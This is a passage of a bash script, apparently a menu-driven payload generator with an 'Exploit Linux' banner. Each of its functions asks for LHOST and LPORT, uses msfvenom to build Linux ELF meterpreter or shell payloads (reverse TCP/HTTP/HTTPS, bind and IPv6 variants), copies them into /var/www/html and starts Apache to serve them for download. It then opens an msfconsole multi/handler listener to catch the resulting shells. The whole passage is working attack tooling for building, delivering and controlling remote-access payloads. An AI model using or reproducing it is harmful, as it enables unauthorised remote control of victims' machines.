| echo $GREEN 1662 | sleep 1 1663 | echo "NAME==>$BLUE $name "$GREEN 1664 | echo 1665 | echo "===========================" 1666 | sleep 1 1667 | echo 1668 | clear 1669 | echo 1670 | echo 1671 | echo " Payload [elf] Final Config: " 1672 | echo "===================================" 1673 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1674 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1675 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1676 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/aarch64/meterpreter_reverse_tcp $GREEN " 1677 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 1678 | sleep 3 1679 | cd $hh/Desktop/ 1680 | if [ -d Output ];then 1681 | echo 1682 | echo "Found Output " 1683 | sleep 1 1684 | else 1685 | mkdir Output 1686 | fi 1687 | cd .. 1688 | echo 1689 | echo 1690 | sleep 1 1691 | lin=.elf 1692 | echo 1693 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1694 | sleep 1 1695 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=$host LPORT=$port -f elf > $hh/Desktop/Output/$name$lin" 1696 | echo 1697 | echo $BLUE"[*]$RED:$GREEN Done! " 1698 | sleep 1 1699 | echo 1700 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1701 | cd $hh/Desktop/Output/ 1702 | chmod +x $name$lin 1703 | cp $name$lin /var/www/html 1704 | echo 1705 | echo "Done ! " 1706 | sleep 2 1707 | echo "" $GREEN 1708 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1709 | sleep 2 1710 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1711 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1712 | sleep 2 1713 | echo 1714 | echo "[*]Done apache server has been started " 1715 | sleep 2 1716 | echo 1717 | echo 1718 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1719 | echo 1720 | echo 1721 | sleep 7 1722 | clear 1723 | echo 1724 | echo 1725 | echo $BLUE" WHAT YOU WANT " 1726 | echo $BLUE"================= " 1727 | echo 1728 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1729 | echo "2 - back to the menu " $GREEN 1730 | echo 1731 | echo -n "Enter choice ->> "$RED 1732 | read choice 1733 | if [ $choice = 1 ];then 1734 | clear 1735 | echo 1736 | echo 1737 | echo "starting Listener on $BLUE[ $name ]" 1738 | sleep 1 1739 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/aarch64/meterpreter_reverse_tcp; exploit -j'" 1740 | else 1741 | 1742 | if [ $choice = 2 ];then 1743 | clear 1744 | fi 1745 | fi 1746 | 1747 | } 1748 | 1749 | linu3 () { 1750 | clear 1751 | echo 1752 | echo 1753 | echo "please wait.......... " 1754 | sleep 2 1755 | clear 1756 | echo ""$BLUE 1757 | echo "------------------------------------------" 1758 | echo "Your Local IP Address:[ $myip " 1759 | echo " " 1760 | echo "Your Public IP Address:[ $myip2 " 1761 | echo " " 1762 | echo "------------------------------------------" 1763 | echo "" $GREEN 1764 | echo -n "Enter LHOST=$RED" 1765 | read host 1766 | echo ""$GREEN 1767 | sleep 1 1768 | echo "LHOST==>$BLUE $host "$GREEN 1769 | echo 1770 | echo "===========================" 1771 | sleep 1 1772 | echo 1773 | echo -n "Enter LPORT=$RED" 1774 | read port 1775 | echo $GREEN 1776 | sleep 1 1777 | echo "LPORT==>$BLUE $port"$GREEN 1778 | echo 1779 | echo "===========================" 1780 | sleep 1 1781 | echo 1782 | echo -n "Enter name for payload=$RED" 1783 | read name 1784 | echo $GREEN 1785 | sleep 1 1786 | echo "NAME==>$BLUE $name "$GREEN 1787 | echo 1788 | echo "===========================" 1789 | sleep 1 1790 | echo 1791 | clear 1792 | echo 1793 | echo 1794 | echo " Payload [elf] Final Config: " 1795 | echo "===================================" 1796 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1797 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1798 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1799 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/aarch64/meterpreter_reverse_http $GREEN " 1800 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 1801 | sleep 3 1802 | cd $hh/Desktop/ 1803 | if [ -d Output ];then 1804 | echo 1805 | echo "Found Output " 1806 | sleep 1 1807 | else 1808 | mkdir Output 1809 | fi 1810 | cd .. 1811 | echo 1812 | echo 1813 | sleep 1 1814 | echo 1815 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1816 | sleep 1 1817 | lin=.elf 1818 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/aarch64/meterpreter_reverse_http LHOST=$host LPORT=$port -f elf > $hh/Desktop/Output/$name$lin" 1819 | echo 1820 | echo $BLUE"[*]$RED:$GREEN Done! " 1821 | sleep 1 1822 | echo 1823 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1824 | cd $hh/Desktop/Output/ 1825 | chmod +x $name$lin 1826 | cp $name$lin /var/www/html 1827 | echo 1828 | echo "Done ! " 1829 | sleep 2 1830 | echo "" $GREEN 1831 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1832 | sleep 2 1833 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1834 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1835 | sleep 2 1836 | echo 1837 | echo "[*]Done apache server has been started " 1838 | sleep 2 1839 | echo 1840 | echo 1841 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1842 | echo 1843 | echo 1844 | sleep 7 1845 | clear 1846 | echo 1847 | echo 1848 | echo $BLUE" WHAT YOU WANT " 1849 | echo $BLUE"================= " 1850 | echo 1851 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1852 | echo "2 - back to the menu " $GREEN 1853 | echo 1854 | echo -n "Enter choice ->> "$RED 1855 | read choice 1856 | if [ $choice = 1 ];then 1857 | clear 1858 | echo 1859 | echo 1860 | echo "starting Listener on $BLUE[ $name ]" 1861 | sleep 1 1862 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/aarch64/meterpreter_reverse_http; exploit -j'" 1863 | else 1864 | 1865 | if [ $choice = 2 ];then 1866 | clear 1867 | fi 1868 | fi 1869 | 1870 | } 1871 | 1872 | 1873 | linu4 () { 1874 | clear 1875 | echo 1876 | echo 1877 | echo "please wait.......... " 1878 | sleep 2 1879 | clear 1880 | echo ""$BLUE 1881 | echo "------------------------------------------" 1882 | echo "Your Local IP Address:[ $myip " 1883 | echo " " 1884 | echo "Your Public IP Address:[ $myip2 " 1885 | echo " " 1886 | echo "------------------------------------------" 1887 | echo "" $GREEN 1888 | echo -n "Enter LHOST=$RED" 1889 | read host 1890 | echo ""$GREEN 1891 | sleep 1 1892 | echo "LHOST==>$BLUE $host "$GREEN 1893 | echo 1894 | echo "===========================" 1895 | sleep 1 1896 | echo 1897 | echo -n "Enter LPORT=$RED" 1898 | read port 1899 | echo $GREEN 1900 | sleep 1 1901 | echo "LPORT==>$BLUE $port"$GREEN 1902 | echo 1903 | echo "===========================" 1904 | sleep 1 1905 | echo 1906 | echo -n "Enter name for payload=$RED" 1907 | read name 1908 | echo $GREEN 1909 | sleep 1 1910 | echo "NAME==>$BLUE $name "$GREEN 1911 | echo 1912 | echo "===========================" 1913 | sleep 1 1914 | echo 1915 | clear 1916 | echo 1917 | echo 1918 | echo " Payload [elf] Final Config: " 1919 | echo "===================================" 1920 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1921 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1922 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1923 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/aarch64/meterpreter_reverse_https $GREEN " 1924 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 1925 | sleep 3 1926 | cd $hh/Desktop/ 1927 | if [ -d Output ];then 1928 | echo 1929 | echo "Found Output " 1930 | sleep 1 1931 | else 1932 | mkdir Output 1933 | fi 1934 | cd .. 1935 | echo 1936 | echo 1937 | sleep 1 1938 | echo 1939 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1940 | sleep 1 1941 | lin=.elf 1942 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/aarch64/meterpreter_reverse_https LHOST=$host LPORT=$port -f elf > $hh/Desktop/Output/$name$lin" 1943 | echo 1944 | echo $BLUE"[*]$RED:$GREEN Done! " 1945 | sleep 1 1946 | echo 1947 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1948 | cd $hh/Desktop/Output/ 1949 | chmod +x $name$lin 1950 | cp $name$lin /var/www/html 1951 | echo 1952 | echo "Done ! " 1953 | sleep 2 1954 | echo "" $GREEN 1955 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1956 | sleep 2 1957 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1958 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1959 | sleep 2 1960 | echo 1961 | echo "[*]Done apache server has been started " 1962 | sleep 2 1963 | echo 1964 | echo 1965 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1966 | echo 1967 | echo 1968 | sleep 7 1969 | clear 1970 | echo 1971 | echo 1972 | echo $BLUE" WHAT YOU WANT " 1973 | echo $BLUE"================= " 1974 | echo 1975 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1976 | echo "2 - back to the menu " $GREEN 1977 | echo 1978 | echo -n "Enter choice ->> "$RED 1979 | read choice 1980 | if [ $choice = 1 ];then 1981 | clear 1982 | echo 1983 | echo 1984 | echo "starting Listener on $BLUE[ $name ]" 1985 | sleep 1 1986 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/aarch64/meterpreter_reverse_https; exploit -j'" 1987 | else 1988 | 1989 | if [ $choice = 2 ];then 1990 | clear 1991 | fi 1992 | fi 1993 | 1994 | } 1995 | 1996 | linu5 () { 1997 | clear 1998 | echo 1999 | echo 2000 | echo "please wait.......... " 2001 | sleep 2 2002 | clear 2003 | echo ""$BLUE 2004 | echo "------------------------------------------" 2005 | echo "Your Local IP Address:[ $myip " 2006 | echo " " 2007 | echo "Your Public IP Address:[ $myip2 " 2008 | echo " " 2009 | echo "------------------------------------------" 2010 | echo "" $GREEN 2011 | echo -n "Enter LHOST=$RED" 2012 | read host 2013 | echo ""$GREEN 2014 | sleep 1 2015 | echo "LHOST==>$BLUE $host "$GREEN 2016 | echo 2017 | echo "===========================" 2018 | sleep 1 2019 | echo 2020 | echo -n "Enter LPORT=$RED" 2021 | read port 2022 | echo $GREEN 2023 | sleep 1 2024 | echo "LPORT==>$BLUE $port"$GREEN 2025 | echo 2026 | echo "===========================" 2027 | sleep 1 2028 | echo 2029 | echo -n "Enter name for payload=$RED" 2030 | read name 2031 | echo $GREEN 2032 | sleep 1 2033 | echo "NAME==>$BLUE $name "$GREEN 2034 | echo 2035 | echo "===========================" 2036 | sleep 1 2037 | echo 2038 | clear 2039 | echo 2040 | echo 2041 | echo " Payload [elf] Final Config: " 2042 | echo "===================================" 2043 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2044 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2045 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2046 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/x86/shell/reverse_tcp $GREEN " 2047 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 2048 | sleep 3 2049 | cd $hh/Desktop/ 2050 | if [ -d Output ];then 2051 | echo 2052 | echo "Found Output " 2053 | sleep 1 2054 | else 2055 | mkdir Output 2056 | fi 2057 | cd .. 2058 | echo 2059 | echo 2060 | sleep 1 2061 | echo 2062 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2063 | sleep 1 2064 | lin=.elf 2065 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/x86/shell/reverse_tcp LHOST=$host LPORT=$port -a x86 --platform Linux -f elf > $hh/Desktop/Output/$name$elf" 2066 | echo 2067 | echo $BLUE"[*]$RED:$GREEN Done! " 2068 | sleep 1 2069 | echo 2070 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2071 | cd $hh/Desktop/Output/ 2072 | chmod +x $name$lin 2073 | cp $name$lin /var/www/html 2074 | echo 2075 | echo "Done ! " 2076 | sleep 2 2077 | echo "" $GREEN 2078 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2079 | sleep 2 2080 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2081 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2082 | sleep 2 2083 | echo 2084 | echo "[*]Done apache server has been started " 2085 | sleep 2 2086 | echo 2087 | echo 2088 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2089 | echo 2090 | echo 2091 | sleep 7 2092 | clear 2093 | echo 2094 | echo 2095 | echo $BLUE" WHAT YOU WANT " 2096 | echo $BLUE"================= " 2097 | echo 2098 | echo "1 - create Listener on [$GREEN $name $BLUE]" 2099 | echo "2 - back to the menu " $GREEN 2100 | echo 2101 | echo -n "Enter choice ->> "$RED 2102 | read choice 2103 | if [ $choice = 1 ];then 2104 | clear 2105 | echo 2106 | echo 2107 | echo "starting Listener on $BLUE[ $name ]" 2108 | sleep 1 2109 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/x86/shell/reverse_tcp; exploit -j'" 2110 | else 2111 | 2112 | if [ $choice = 2 ];then 2113 | clear 2114 | fi 2115 | fi 2116 | 2117 | } 2118 | 2119 | linu6 () { 2120 | clear 2121 | echo 2122 | echo 2123 | echo "please wait.......... " 2124 | sleep 2 2125 | clear 2126 | echo ""$BLUE 2127 | echo "------------------------------------------" 2128 | echo "Your Local IP Address:[ $myip " 2129 | echo " " 2130 | echo "Your Public IP Address:[ $myip2 " 2131 | echo " " 2132 | echo "------------------------------------------" 2133 | echo "" $GREEN 2134 | echo -n "Enter LHOST=$RED" 2135 | read host 2136 | echo ""$GREEN 2137 | sleep 1 2138 | echo "LHOST==>$BLUE $host "$GREEN 2139 | echo 2140 | echo "===========================" 2141 | sleep 1 2142 | echo 2143 | echo -n "Enter LPORT=$RED" 2144 | read port 2145 | echo $GREEN 2146 | sleep 1 2147 | echo "LPORT==>$BLUE $port"$GREEN 2148 | echo 2149 | echo "===========================" 2150 | sleep 1 2151 | echo 2152 | echo -n "Enter name for payload=$RED" 2153 | read name 2154 | echo $GREEN 2155 | sleep 1 2156 | echo "NAME==>$BLUE $name "$GREEN 2157 | echo 2158 | echo "===========================" 2159 | sleep 1 2160 | echo 2161 | clear 2162 | echo 2163 | echo 2164 | echo " Payload [elf] Final Config: " 2165 | echo "===================================" 2166 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2167 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2168 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2169 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/x86/shell/bind_ipv6_tcp $GREEN " 2170 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 2171 | sleep 3 2172 | cd $hh/Desktop/ 2173 | if [ -d Output ];then 2174 | echo 2175 | echo "Found Output " 2176 | sleep 1 2177 | else 2178 | mkdir Output 2179 | fi 2180 | cd .. 2181 | echo 2182 | echo 2183 | sleep 1 2184 | echo 2185 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2186 | sleep 1 2187 | lin=.elf 2188 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/x86/shell/bind_ipv6_tcp LHOST=$host LPORT=$port -a x86 --platform Linux -f elf > $hh/Desktop/Output/$name$lin" 2189 | echo 2190 | echo $BLUE"[*]$RED:$GREEN Done! " 2191 | sleep 1 2192 | echo 2193 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2194 | cd $hh/Desktop/Output/ 2195 | chmod +x $name$lin 2196 | cp $name$lin /var/www/html 2197 | echo 2198 | echo "Done ! " 2199 | sleep 2 2200 | echo "" $GREEN 2201 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2202 | sleep 2 2203 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2204 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2205 | sleep 2 2206 | echo 2207 | echo "[*]Done apache server has been started " 2208 | sleep 2 2209 | echo 2210 | echo 2211 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2212 | echo 2213 | echo 2214 | sleep 7 2215 | clear 2216 | echo 2217 | echo 2218 | echo $BLUE" WHAT YOU WANT " 2219 | echo $BLUE"================= " 2220 | echo 2221 | echo "1 - create Listener on [$GREEN $name $BLUE]" 2222 | echo "2 - back to the menu " $GREEN 2223 | echo 2224 | echo -n "Enter choice ->> "$RED 2225 | read choice 2226 | if [ $choice = 1 ];then 2227 | clear 2228 | echo 2229 | echo 2230 | echo "starting Listener on $BLUE[ $name ]" 2231 | sleep 1 2232 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/x86/shell/bind_ipv6_tcp; exploit -j'" 2233 | else 2234 | 2235 | if [ $choice = 2 ];then 2236 | clear 2237 | fi 2238 | fi 2239 | 2240 | } 2241 | 2242 | linu7 () { 2243 | clear 2244 | echo 2245 | echo 2246 | echo "please wait.......... " 2247 | sleep 2 2248 | clear 2249 | echo ""$BLUE 2250 | echo "------------------------------------------" 2251 | echo "Your Local IP Address:[ $myip " 2252 | echo " " 2253 | echo "Your Public IP Address:[ $myip2 " 2254 | echo " " 2255 | echo "------------------------------------------" 2256 | echo "" $GREEN 2257 | echo -n "Enter LHOST=$RED" 2258 | read host 2259 | echo ""$GREEN 2260 | sleep 1 2261 | echo "LHOST==>$BLUE $host "$GREEN 2262 | echo 2263 | echo "===========================" 2264 | sleep 1 2265 | echo 2266 | echo -n "Enter LPORT=$RED" 2267 | read port 2268 | echo $GREEN 2269 | sleep 1 2270 | echo "LPORT==>$BLUE $port"$GREEN 2271 | echo 2272 | echo "===========================" 2273 | sleep 1 2274 | echo 2275 | echo -n "Enter name for payload=$RED" 2276 | read name 2277 | echo $GREEN 2278 | sleep 1 2279 | echo "NAME==>$BLUE $name "$GREEN 2280 | echo 2281 | echo "===========================" 2282 | sleep 1 2283 | echo 2284 | clear 2285 | echo 2286 | echo 2287 | echo " Payload [elf] Final Config: " 2288 | echo "===================================" 2289 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2290 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2291 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2292 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/x86/shell/bind_tcp $GREEN " 2293 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 2294 | sleep 3 2295 | cd $hh/Desktop/ 2296 | if [ -d Output ];then 2297 | echo 2298 | echo "Found Output " 2299 | sleep 1 2300 | else 2301 | mkdir Output 2302 | fi 2303 | cd .. 2304 | echo 2305 | echo 2306 | sleep 1 2307 | echo 2308 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2309 | sleep 1 2310 | lin=.elf 2311 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/x86/shell/bind_tcp LHOST=$host LPORT=$port -a x86 --platform Linux -f elf > $hh/Desktop/Output/$name$lin" 2312 | echo 2313 | echo $BLUE"[*]$RED:$GREEN Done! " 2314 | sleep 1 2315 | echo 2316 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2317 | cd $hh/Desktop/Output/ 2318 | chmod +x $name$lin 2319 | cp $name$lin /var/www/html 2320 | echo 2321 | echo "Done ! " 2322 | sleep 2 2323 | echo "" $GREEN 2324 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2325 | sleep 2 2326 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2327 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2328 | sleep 2 2329 | echo 2330 | echo "[*]Done apache server has been started " 2331 | sleep 2 2332 | echo 2333 | echo 2334 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2335 | echo 2336 | echo 2337 | sleep 7 2338 | clear 2339 | echo 2340 | echo 2341 | echo $BLUE" WHAT YOU WANT " 2342 | echo $BLUE"================= " 2343 | echo 2344 | echo "1 - create Listener on [$GREEN $name $BLUE]" 2345 | echo "2 - back to the menu " $GREEN 2346 | echo 2347 | echo -n "Enter choice ->> "$RED 2348 | read choice 2349 | if [ $choice = 1 ];then 2350 | clear 2351 | echo 2352 | echo 2353 | echo "starting Listener on $BLUE[ $name ]" 2354 | sleep 1 2355 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/x86/shell/bind_tcp; exploit -j'" 2356 | else 2357 | 2358 | if [ $choice = 2 ];then 2359 | clear 2360 | fi 2361 | fi 2362 | 2363 | } 2364 | 2365 | 2366 | linu8 () { 2367 | clear 2368 | echo 2369 | echo 2370 | echo "please wait.......... " 2371 | sleep 2 2372 | clear 2373 | echo ""$BLUE 2374 | echo "------------------------------------------" 2375 | echo "Your Local IP Address:[ $myip " 2376 | echo " " 2377 | echo "Your Public IP Address:[ $myip2 " 2378 | echo " " 2379 | echo "------------------------------------------" 2380 | echo "" $GREEN 2381 | echo -n "Enter LHOST=$RED" 2382 | read host 2383 | echo ""$GREEN 2384 | sleep 1 2385 | echo "LHOST==>$BLUE $host "$GREEN 2386 | echo 2387 | echo "===========================" 2388 | sleep 1 2389 | echo 2390 | echo -n "Enter LPORT=$RED" 2391 | read port 2392 | echo $GREEN 2393 | sleep 1 2394 | echo "LPORT==>$BLUE $port"$GREEN 2395 | echo 2396 | echo "===========================" 2397 | sleep 1 2398 | echo 2399 | echo -n "Enter name for payload=$RED" 2400 | read name 2401 | echo $GREEN 2402 | sleep 1 2403 | echo "NAME==>$BLUE $name "$GREEN 2404 | echo 2405 | echo "===========================" 2406 | sleep 1 2407 | echo 2408 | clear 2409 | echo 2410 | echo 2411 | echo " Payload [elf] Final Config: " 2412 | echo "===================================" 2413 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2414 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2415 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2416 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/x86/shell/reverse_ipv6_tcp $GREEN " 2417 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 2418 | sleep 3 2419 | cd $hh/Desktop/ 2420 | if [ -d Output ];then 2421 | echo 2422 | echo "Found Output " 2423 | sleep 1 2424 | else 2425 | mkdir Output 2426 | fi 2427 | cd .. 2428 | echo 2429 | echo 2430 | sleep 1 2431 | echo 2432 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2433 | sleep 1 2434 | lin=.elf 2435 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/x86/shell/reverse_ipv6_tcp LHOST=$host LPORT=$port -a x86 --platform Linux -f elf > $hh/Desktop/Output/$name$lin" 2436 | echo 2437 | echo $BLUE"[*]$RED:$GREEN Done! " 2438 | sleep 1 2439 | echo 2440 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2441 | cd $hh/Desktop/Output/ 2442 | chmod +x $name$lin 2443 | cp $name$lin /var/www/html 2444 | echo 2445 | echo "Done ! " 2446 | sleep 2 2447 | echo "" $GREEN 2448 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2449 | sleep 2 2450 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2451 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2452 | sleep 2 2453 | echo 2454 | echo "[*]Done apache server has been started " 2455 | sleep 2 2456 | echo 2457 | echo 2458 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2459 | echo 2460 | echo 2461 | sleep 7 2462 | clear 2463 | echo 2464 | echo 2465 | echo $BLUE" WHAT YOU WANT " 2466 | echo $BLUE"================= " 2467 | echo 2468 | echo "1 - create Listener on [$GREEN $name $BLUE]" 2469 | echo "2 - back to the menu " $GREEN 2470 | echo 2471 | echo -n "Enter choice ->> "$RED 2472 | read choice 2473 | if [ $choice = 1 ];then 2474 | clear 2475 | echo 2476 | echo 2477 | echo "starting Listener on $BLUE[ $name ]" 2478 | sleep 1 2479 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/x86/shell/reverse_ipv6_tcp; exploit -j'" 2480 | else 2481 | 2482 | if [ $choice = 2 ];then 2483 | clear 2484 | fi 2485 | fi 2486 | 2487 | } 2488 | 2489 | 2490 | 2491 | function linu { 2492 | 2493 | clear 2494 | 2495 | cat << ! 2496 | 2497 | $RED 2498 | ┌─┐─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ ╦ ┬┌┐┌┬ ┬─┐ ┬ 2499 | ├┤ ┌┴┬┘├─┘│ │ ││ │ ║ │││││ │┌┴┬┘ 2500 | └─┘┴ └─┴ ┴─┘└─┘┴ ┴ ╩═╝┴┘└┘└─┘┴ └─$BLUE 2501 | 2502 | PAYLOADS 2503 | ========= 2504 | 2505 | 2506 | METERPRETER 2507 | ===========$GREEN 2508 | 1 $BLUE > linux/x86/meterpreter/reverse_tcp $GREEN 2509 | 2 $BLUE > linux/aarch64/meterpreter_reverse_tcp $GREEN 2510 | 3 $BLUE > linux/aarch64/meterpreter_reverse_http $GREEN 2511 | 4 $BLUE > linux/aarch64/meterpreter_reverse_https $BLUE 2512 | 2513 | SHEEL 2514 | ========$GREEN 2515 | 5 $BLUE > linux/x86/shell/reverse_tcp $GREEN 2516 | 6 $BLUE > linux/x86/shell/bind_ipv6_tcp $GREEN 2517 | 7 $BLUE > linux/x86/shell/bind_tcp $GREEN 2518 | 8 $BLUE > linux/x86/shell/reverse_ipv6_tcp $GREEN 2519 | 2520 | 9 $BLUE >$RED EXIT $GREEN 2521 | 2522 | ! 2523 | echo "=============================================" 2524 | echo 2525 | echo -n "Choice pyload :>$RED " 2526 | read linu 2527 | case $linu in 2528 | 1)linre ;; 2529 | 2)linu2 ;; 2530 | 3)linu3 ;; 2531 | 4)linu4 ;; 2532 | 5)linu5 ;; 2533 | 6)linu6 ;; 2534 | 7)linu7 ;; 2535 | 8)linu8 ;; 2536 | 9)exie ;; 2537 | *) echo "\"$linu\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 2538 | esac 2539 | linu 2540 | 2541 | } 2542 | 2543 | 2544 | 2545 | 2546 | mac () { 2547 | clear 2548 | 2549 | cat << ! 2550 | 2551 | $RED 2552 | 2553 | ┌─┐─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ ╔╦╗╔═╗╔═╗ ╔═╗╔═╗ 2554 | ├┤ ┌┴┬┘├─┘│ │ ││ │ ║║║╠═╣║ ║ ║╚═╗ 2555 | └─┘┴ └─┴ ┴─┘└─┘┴ ┴ ╩ ╩╩ ╩╚═╝ ╚═╝╚═╝$GREEN 2556 | ! 2557 | echo "============================================="$BLUE 2558 | echo 2559 | echo "please wait.......... " 2560 | sleep 2 2561 | clear 2562 | echo ""$BLUE 2563 | echo "------------------------------------------" 2564 | echo "Your Local IP Address:[ $myip " 2565 | echo " " 2566 | echo "Your Public IP Address:[ $myip2 " 2567 | echo " " 2568 | echo "------------------------------------------" 2569 | echo "" $GREEN 2570 | 